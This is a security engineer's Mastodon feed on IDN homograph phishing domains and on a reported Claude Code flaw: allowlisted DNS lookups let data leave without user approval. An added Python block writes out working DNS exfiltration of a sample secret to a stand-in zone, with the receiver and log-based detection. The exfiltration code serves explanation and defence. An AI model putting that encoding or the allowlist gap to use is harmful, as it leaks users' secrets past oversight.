@neurovagrant@masto.deoan.org
"What radicalized you?"
When they DRM'd coffee.
Security ops engineer for DomainTools, DT Investigations threat researcher, writer, voracious reader. he/him. Fan of good trouble. Opinions here mine only. No LLM content from me, all flaws detected are human-generated. Autistic/depressed/anxious/hungry.
#infosec #cybersecurity #privacy #actuallyautistic #neurodivergent
Hello friends, I've seen the below image come up a few times elsewhere and am going to expound a little!
While the hyperlinks in the image display correctly, those aren't actually the addresses of those sites! Instead, they're the Internationalized Domain Name replacements - examples of what are called IDN Homograph Attacks.
It's incredibly hard to include all characters from all active alphabets in the mechanisms that resolve domain names - so currently that letter set is restricted, and instead uses a translation system called Punycode to move between a visual URL with the correct characters and a domain name your computer can actually resolve to a website.
So while neurovagrant[.]com is fine either way, nә̃urovagrant[.]com isn't! The actual domain would be xn--nurovagrant-rkg322d[.]com.
Notice that xn-- ! That's what tells browsers and other software that it's an IDN domain, and to try and translate it.
Attackers use this to their benefit. So:
xn--mcrosoft-security-teams-1ec[.]com can appear in your email, on your twitter feed, in other places visually as: mícrosoft-security-teams[.]com
You may think you're signing in to check your retirement at vanguarɗ[.]com but it's actually sent you to xn--vanguar-4cd[.]com
A link that appears as vḙnmo[.]com actually sends you to the website xn--vnmo-q64a[.]com
They even target kids! Take a look at xn--rblox-jua[.]com - which looks like röblox[.]com in most settings. Note the diacritical mark above the first o.
If anything looks off, there's a reason. Always view links with skepticism, don't click on things unnecessarily, and always sign into the sites you use by going to the domain name you know.
Stay frosty out there, friends.
#cybersecurity #infosec #StayFrosty
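The Punycode round trip the post describes, as an added example (not code from the post): it takes the xn-- domains quoted above, turns them back into the Unicode labels a browser would display, and prints why each one should trip a reviewer. It uses only Python's built-in punycode codec and unicodedata; the script classifier is a crude heuristic of my own (the first word of the Unicode character name, so "LATIN", "CYRILLIC", "GREEK" and so on), not the confusable tables browsers use.

```python
"""Decode the xn-- labels from the post and flag the lookalikes.

Added example, not from the original post: uses only Python's built-in
punycode codec and unicodedata; the domain strings are the ones quoted above.
"""
import unicodedata

ACE_PREFIX = "xn--"


def to_unicode(domain: str) -> str:
    """Turn each xn-- label back into the Unicode label a browser would display."""
    labels = []
    for label in domain.lower().split("."):
        if label.startswith(ACE_PREFIX):
            labels.append(label[len(ACE_PREFIX):].encode("ascii").decode("punycode"))
        else:
            labels.append(label)
    return ".".join(labels)


def to_ascii(domain: str) -> str:
    """Inverse of to_unicode: Punycode-encode any label that is not pure ASCII."""
    labels = []
    for label in domain.lower().split("."):
        if label.isascii():
            labels.append(label)
        else:
            labels.append(ACE_PREFIX + label.encode("punycode").decode("ascii"))
    return ".".join(labels)


def script_of(ch: str) -> str:
    """Crude script classifier (assumption): first word of the Unicode name."""
    if unicodedata.combining(ch):
        return "COMBINING"
    if ch.isascii():
        return "LATIN" if ch.isalpha() else "COMMON"
    return unicodedata.name(ch, "UNKNOWN").split(" ")[0]


def homograph_findings(domain: str) -> list:
    """One human-readable finding per label that contains non-ASCII characters."""
    findings = []
    for label in to_unicode(domain).split("."):
        non_ascii = [c for c in label if not c.isascii()]
        if not non_ascii:
            continue
        scripts = {script_of(c) for c in label} - {"COMMON"}
        names = ", ".join(f"U+{ord(c):04X} {unicodedata.name(c, '?')}" for c in non_ascii)
        if len(scripts) > 1:
            findings.append(f"{label}: mixed scripts {sorted(scripts)} -> {names}")
        else:
            findings.append(f"{label}: non-ASCII lookalike letters -> {names}")
    return findings


if __name__ == "__main__":
    for d in ["neurovagrant.com", "xn--nurovagrant-rkg322d.com",
              "xn--mcrosoft-security-teams-1ec.com", "xn--vanguar-4cd.com",
              "xn--vnmo-q64a.com", "xn--rblox-jua.com"]:
        print(f"{d:40} displays as {to_unicode(d)!r}")
        for finding in homograph_findings(d):
            print("   !", finding)
```

Note that the built-in `idna` codec (IDNA 2003) would additionally run nameprep and lowercasing before Punycode; the raw `punycode` codec is used here so the xn-- mechanics are visible exactly as the post describes them.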
Some introductory information:
I'm a security operations engineer in the cybersecurity space, a lovingly hungry reader (nonfiction, speculative fiction, and horror especially), a sometimes-writer when I have the brainspace for it.
I love crows, spooky things, democracy, and coffee.
I'm at times depressed, or anxious, and diagnosed autistic so I talk about neurodivergence too.
dying laughing here:
https://github.com/google-gemini/gemini-cli/issues/16750
For my friends out there on the job hunt.
New research out from @DomainTools@infosec.exchange Investigations today!
We took time to pull apart the "Charming Kitten" data dump and analyze it accordingly.
Always fascinating to me how different the threat actor groups can be both domestically and regionally. In APT35's case, much more militarily regimented, versus hybrid "state startup waterfall" or "criminal-state merge blend" setups.
#infosec #cybersecurity #threatintel
https://dti.domaintools.com/threat-intelligence-report-apt35-internal-leak-of-hacking-campaigns-against-lebanon-kuwait-turkey-saudi-arabia-korea-and-domestic-iranian-targets/
Audiobooks are a 100% valid way of reading, and if it's your primary way, I hear & honor ya.
Your irregular reminder that if you enjoy audiobooks Libro.fm is an incredibly good replacement for Audible.
Libro.fm provides DRM-free downloadable MP3 versions of the book (in addition to having an app you can use). They've had at least 90% of the books I've looked for.
They're also an employee-owned social corporation that allows you to support local independent bookstores with your purchases.
i mean who could've expected a yearslong, deeply researched, regularly used method of data exfiltration COULD BE ABUSED BY REMOVING NECESSARY USER INTERACTION
me trying to be less adversarial towards AI and then they specifically enable noclick DNS exfil
This is some really smart digging: realizing that Claude Code does not require user interaction for certain bash commands, they discovered that DNS lookups were specifically allowlisted, clearing a trivial path for well-known DNS exfiltration methods.
So when I say "all these implementations are ignoring years and decades of lessons learned the hard way" it's not hyperbole. Anthropic 100% cleared the path for DNS exfil here.
h/t to @cR0w@infosec.exchange - thank you!
#infosec #genai
https://embracethered.com/blog/posts/2025/claude-code-exfiltration-via-dns-requests/
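The "well-known DNS exfiltration methods" the post refers to, as an added example that is not code from the post or from the linked write-up: it shows the generic chunk-into-labels encoding an exfil tool uses once name resolution is the one thing it is allowed to do, the receiver side that reassembles the secret from the names it sees, and two cheap resolver-log signals a detection engineer can key on. The attacker zone, the secret and the log lines are constructed for illustration; the log format ("... q=<name> ...") is an assumption.

```python
"""DNS as an exfiltration channel: the encoding, the receiver, and two log-side signals.

Added example, not code from the post or the linked write-up. The attacker zone,
the secret and the resolver log lines are all constructed for illustration.
"""
import base64
import math
from collections import defaultdict

ATTACKER_ZONE = "collector.example"   # constructed stand-in for an attacker-controlled zone
MAX_LABEL = 63                        # DNS label length limit (RFC 1035)


def exfil_queries(secret: bytes, zone: str = ATTACKER_ZONE) -> list:
    """Names a leaking process would resolve to push `secret` out through DNS.

    Base32 keeps labels inside the hostname alphabet and survives resolvers that
    lowercase names; a sequence label lets the receiver reassemble out of order.
    """
    payload = base64.b32encode(secret).decode("ascii").rstrip("=").lower()
    chunks = [payload[i:i + MAX_LABEL] for i in range(0, len(payload), MAX_LABEL)]
    return [f"{seq}.{chunk}.{zone}" for seq, chunk in enumerate(chunks)]


def reassemble(queries: list, zone: str = ATTACKER_ZONE) -> bytes:
    """What the authoritative server for `zone` does with the names it receives."""
    suffix = "." + zone
    parts = {}
    for q in queries:
        if not q.endswith(suffix):
            continue
        seq, chunk = q[:-len(suffix)].split(".", 1)
        parts[int(seq)] = chunk
    payload = "".join(parts[k] for k in sorted(parts)).upper()
    return base64.b32decode(payload + "=" * (-len(payload) % 8))


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded data sits well above human-chosen hostnames."""
    counts = defaultdict(int)
    for c in s:
        counts[c] += 1
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def flag_dns_exfil(log_lines: list, min_unique: int = 3, long_label: int = 30) -> dict:
    """Per zone (last two labels): distinct subdomains seen and the longest label.

    Returns {zone: (unique_subdomains, longest_label_len, max_label_entropy)} for
    zones that look like a tunnel: many distinct names under one zone and at least
    one label far longer than anything a human would type. Log format assumed:
    whitespace-separated key=value fields with the queried name under "q=".
    """
    subs = defaultdict(set)
    for line in log_lines:
        fields = dict(f.split("=", 1) for f in line.split() if "=" in f)
        labels = fields.get("q", "").lower().rstrip(".").split(".")
        if len(labels) < 3:
            continue
        subs[".".join(labels[-2:])].add(".".join(labels[:-2]))
    flagged = {}
    for zone, names in subs.items():
        labels = [lab for n in names for lab in n.split(".")]
        longest = max(len(lab) for lab in labels)
        entropy = max(shannon_entropy(lab) for lab in labels)
        if len(names) >= min_unique and longest >= long_label:
            flagged[zone] = (len(names), longest, round(entropy, 2))
    return flagged


# Constructed secret (112 bytes -> 180 base32 characters -> 3 labels of <= 63).
SECRET = (b"db_password=correct-horse-battery-staple;"
          b"api_token=0123456789abcdef0123456789abcdef;"
          b"signing_key=deadbeefcafebabe")

# Constructed resolver log: ordinary traffic plus the exfil names generated above.
SAMPLE_LOG = [
    "2025-10-02T12:00:01Z client=10.0.0.5 q=www.github.com type=A",
    "2025-10-02T12:00:02Z client=10.0.0.5 q=api.github.com type=A",
    "2025-10-02T12:00:03Z client=10.0.0.5 q=registry.npmjs.org type=A",
] + [f"2025-10-02T12:00:0{4 + i}Z client=10.0.0.5 q={q} type=A"
     for i, q in enumerate(exfil_queries(SECRET))]

if __name__ == "__main__":
    for q in exfil_queries(SECRET):
        print("lookup:", q)
    print("receiver recovered the secret:", reassemble(exfil_queries(SECRET)) == SECRET)
    for zone, (n, longest, ent) in flag_dns_exfil(SAMPLE_LOG).items():
        print(f"FLAG {zone}: {n} unique names, longest label {longest}, entropy {ent:.2f}")
```

The point of the two signals is that neither depends on knowing the attacker's zone in advance: an allowlist that permits "just DNS" permits exactly this traffic, so the control has to live in the resolver logs (or in an egress resolver that refuses unknown zones), not in the tool's command filter.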
Hey! I know those guys!! Great conversation between two of the best leaders I've ever worked under. When you hear @danonsecurity@infosec.exchange talk about his love of and approach to community, you'll see why I'm ride-or-die.
And having been on 12-24hr bridge calls with both him and @bapril@infosec.exchange when the crap hit the fan, as well as having come to them both to take responsibility for mistakes or errors in judgment, I can vouch that they both walk the walk covered here.
#infosec
https://youtu.be/yuryI513s2M